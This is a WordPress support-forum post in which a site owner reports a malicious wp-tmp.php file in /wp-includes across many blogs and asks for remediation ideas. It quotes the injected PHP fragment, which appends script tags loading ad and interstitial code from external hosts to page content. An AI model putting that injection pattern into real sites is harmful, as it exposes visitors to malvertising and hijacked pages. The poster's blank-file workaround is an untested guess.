Malware detected
-
Hello,
I’ve found some malware injected code into /wp-includes.
There is a file there named “wp-tmp.php”.And it has something like
“$con2 = ‘<script type=”text/javascript” src=”//go.xxxx.com/apu.php?zoneid=1587119″></script>
<script async=”async” type=”text/javascript” src=”//go.xxx.com/notice.php?p=1587121&interactive=1&pushup=1″></script>
<script src=”//xxx.com/ntfc.php?p=1587123″ data-cfasync=”false” async></script>
<script src=”//go.xxx.com/notice.php?p=1587122&interstitial=1″></script>
‘;$content=$content.$con2;
”I’m using a shared hosting and I have like 20-30 wordpress blogs there, with one cpanel.
So I think because of a plugin or theme, this malware has propagated on all the websites.What I did was to create a blank file named wp-tmp.php and upload it over the existing one, giving it 0 permission.
So I think when the malware will try to create this file, it won’t be able.
Any other ideas?
I’ve updated the wordpress versions, but it will be really hard to debug and understand from this is coming from because of so many websites and various plugins.
- The topic ‘Malware detected’ is closed to new replies.